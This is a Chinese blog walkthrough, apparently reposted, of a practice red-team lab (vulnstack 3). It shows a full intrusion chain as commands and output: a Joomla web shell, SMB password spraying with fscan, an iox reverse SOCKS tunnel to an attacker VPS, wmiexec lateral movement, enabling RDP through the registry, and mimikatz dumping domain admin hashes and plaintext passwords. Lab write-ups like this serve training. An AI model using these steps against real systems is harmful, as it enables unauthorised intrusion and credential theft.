红队评估实战靶场(三)

企业开发 2023-12-18 00:35:48 阅读次数: 0

环境下载

http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

网络搭建

Centsos 默认192.18.93.100,图片IP地址有误
在这里插入图片描述

添加WMnet2 网络,仅主机模式,子网IP 192.168.93.0
在这里插入图片描述

web渗透

web_centsos ,ubuntu

开放的端口

80,22,3306

dirsearch扫描

工具地址:https://github.com/maurosoria/dirsearch

命令:

python3 dirsearch.py -u http://192.168.0.101/ -e*

在这里插入图片描述

扫描出来 /configuration.php~配置文件,文件内容有数据账户密码
testuser cvcvgjASD!@

am2zu_users表添加管理员用户

$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti   123456

在这里插入图片描述

am2zu_user_usergroup_map 配置权限
在这里插入图片描述

joomal后台写shell

使用添加的管理员账户登录后台

http://192.168.0.101/administrator/index.php  test 123456

在这里插入图片描述

在index.php 添加一句话语句
在这里插入图片描述

保存访问首页,然后连接蚁剑
在这里插入图片描述

/tmp/mysql/test.txt 文件中存有ssh用户密码

adduser wwwuser
passwd wwwuser_123Aqx

ssh [email protected]

登录上去ssh后,发现两个ip不一样,使用了nginx反向代理
在这里插入图片描述

内网渗透

fscan内网扫描

将fscan上传到192.168.93.100机器上去,扫描内网smb

./fscan_386 -h 192.168.93.0/24 -pwdf 2.txt -m smb

(icmp) Target 192.168.93.1    is alive
(icmp) Target 192.168.93.10   is alive
(icmp) Target 192.168.93.20   is alive
(icmp) Target 192.168.93.30   is alive
(icmp) Target 192.168.93.100  is alive
(icmp) Target 192.168.93.120  is alive
[*] Icmp alive hosts len is: 6
192.168.93.30:445 open
192.168.93.1:445 open
192.168.93.20:445 open
192.168.93.10:445 open
[*] alive ports len is: 4
start vulscan
[+] SMB:192.168.93.30:445:administrator 123qwe!ASD
[+] SMB:192.168.93.20:445:administrator 123qwe!ASD

搭建socks5隧道 iox

使用iox工具来搭建隧道

攻击机vps监听

iox.exe proxy -l 9999 -l 1080

在这里插入图片描述

内网机器执行命令,192.168.0.102为攻击机ip

./iox proxy -r 192.168.0.102:9999

在这里插入图片描述

建立连接
在这里插入图片描述

Proxifier

使用Proxifier工具来配置socks5
在这里插入图片描述

wmiexec 连接smb

wmiexec.exe administrator:[email protected]
wmiexec.exe administrator:[email protected]

在这里插入图片描述

开启3389端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

开启了3389后,使用administrator账户登录,为了方便文件传输,在登录3389时,设置本地资源-> 驱动器

administrator:[email protected]
administrator:[email protected]

在这里插入图片描述

使用mimikatz读取密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> mimi.txt

在这里插入图片描述

获取到域控管理员密码

Session           : Interactive from 2
User Name         : Administrator
Domain            : TEST
Logon Server      : WIN-8GA56TNV3MV
Logon Time        : 2019/12/15 13:24:56
SID               : S-1-5-21-1528753600-3951244198-520479113-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : TEST
	 * LM       : fc5d63d71569f04399b419bc76e2eb34
	 * NTLM     : 18edd0cc3227be3bf61ce198835a1d97
	 * SHA1     : 0f058e319f079c15fe3449bbeffc086cfa4d231e
	tspkg :	
	 * Username : Administrator
	 * Domain   : TEST
	 * Password : zxcASDqw123!!
	wdigest :	
	 * Username : Administrator
	 * Domain   : TEST
	 * Password : zxcASDqw123!!
	kerberos :	
	 * Username : Administrator
	 * Domain   : TEST.ORG
	 * Password : zxcASDqw123!!
	ssp :	
	credman :

使用wmiexec 登录域控

wmiexec.exe administrator:[email protected]

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_18193739/article/details/132109689
今日推荐
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
周排行
static方法和非static方法的区别(java)
如何查找计算机专业paper
java.lang.ClassFormatError: Incompatible magic value 0 in class file com/sitecha
跳跃游戏II
stm32_之【建立工程】
TeaWeb v0.0.9 发布,统计底层优化、主机监控功能改进
事件分发 -----控制字体大小
JavaScript DOM练习(动态表格添加) December 25,2019
JSF Scope & CDI
实现从零搭建一个登录注册页面(附源代码)
每日归档
更多
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022